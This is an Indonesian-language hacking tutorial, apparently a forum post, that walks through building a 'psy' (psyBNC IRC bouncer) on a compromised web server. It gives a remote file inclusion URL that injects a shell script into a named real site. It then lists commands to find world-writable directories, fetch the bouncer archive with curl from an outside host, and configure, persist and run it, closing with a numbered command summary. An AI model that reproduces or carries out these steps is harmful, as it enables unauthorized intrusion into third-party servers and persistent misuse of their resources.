MEMBUAT PSY
Next info cara membuat psy. Nah kalian kan udh punya shell to?? Terserah yg illegal or halal. Klo udh punya langsung aja deh, perlu gue ingetin, disini gue menggunakan shell injekan. Oke misalnya gue pake shell injekan http://josephli.com.hk/listening/f5/2007/a/ezusermanager_pwd_forgott.php//ezusermanager_pwd_forgott.php?ezUserManager_Path= dan menggunakn shell injector http://h1.ripway.com/zand/s.txt. langsung ja lu buka di browser http://josephli.com.hk/listening/f5/2007/a/ezusermanager_pwd_forgott.php//ezusermanager_pwd_forgott.php?ezUserManager_Path=http://h1.ripway.com/zand/s.txt?? (ingat tanda tanyanya(?) jgn lupa). Nah setelah ntu lu bisa masuk di salah satu directory yg full permission(drwxwxwx) pokoknya direktori yg ful permission ntu biasanya terdpaat huruf W 3 kali (W = writer = tulis) (drwxwxw) cara nyarinya ketik aja di kolon enter find / -perm 777 –type d. Missal lu nemuin directory /usr/local/src/libiconv-1.11/lib/.libs lu langsung aja masuk di directory ntu(kopr paste ke kolom directory terus klik list) dan langsung bikin direktori aja. Caranya ketik ja di klom enter mkdri (nma folder) contoh mkdir zandra terus lu klik enter, beres dah.
But klo lu nggak dpt folder yg permison direktori kayak /usr/local/src/libiconv-1.11/lib/.libs lu bisa langsung get to folder /tmp/. Caranya ketik aja di kolom directory tulisan /tmp/ terus klik list. Ntar akan keluar semua isi folder tmp. Next lu bikin aja langsung folder ndiri. Contoh mkdir zandra. N lu langsung ja masuk difolder yg lu td buat. Contoh ketik aja di kolom directory /tmp/zandra/ terus klik list. Nah selanjutnya tinggal mbikin psynya.
Langsung ja deh lu downloads filenya. Caranya ketik curl –f –O http://fobiabar.com/data/psy.tar.gz klo udh lu langsung exstrak tu file psy dgn cara ketik tar –zxvf psy.tar.gz ntar akan muncul semua file hasil extrakan tadi. Terus lu masuk di directory .psy caranya lu tambahin aja pd klom directory tulisan .psy di belakang tulisan /tmp/zandra/ menjadi /tmp/zandra/.psy terus klik list ntar akan muncul isi directory .psy.
Nah setelah ntu lu tinggal atur konfigurasi psynya. Caranya pad kolom enter lu ketik ./config (portmu) semisal ./config 1991 terus klik enter. Ntar akan muncul tulisan konfigurasi psy. (ingat port anda cukup 4 digit, usakan memakai port y glum pernah dipakai sebelum, y portnya harus yg antic bro). next l uterus ketik di kolom enter ./fuck fungsi dari comande ./fuck ini agar klo ntar proses koneksi psy bnc diputus oleh server pusat, otomatis psy kan join lg. langkah terakhis adalah ngetik ./run untuk menjalankan bot. selesai deh. Tinggal lu jalankan psymu. Caranya buka aplikasi ircmu baik mirc(computer) ataupun irc hp(kayak xirc or jmirc. Lu masukin nama domain injekan lu sebagai alamat server semisal :josephli.com.hk terus portnya diisi port yg lu td buat, semisal 1991. ok deh tinggal save n konek, ntar pertama kali lu login psy akan di suruh nentuin passwordmmu kayak tulisan /quote pass, lu klo pake mirc, ketik aja /quote pass 1 maka akan langsung di pv –psybnc yg berisi komand dalam penggunaan mirc, tp klo lu pake hp, maka klo lu ngetik /quote pass 1 akan muncul unkwon command, ya untuk ngakalinnya, pada porfil lu, lu isi aja serverpass ma passwordlu. Beres deh. Selanjutnya agar psy terkoneksi ke server yglu inginkan tinggal ketik aja addserver irc.circleone.net.id:667 pada pv an –psybnc. Beres deh
Nich ringkasan pembuatan psy

1. Cd /var/tmp/
2. mkdir zandra
3. cd zandra
4. ls –al
5. curl –f –O http://fobiabar.com/data/psy.tar.gz
6. tar –zxvf psy.tar.gz
7. cd .psy
8. ls –al
9. ./config 1991
10. ./fuck
11. ./run
12. beres deh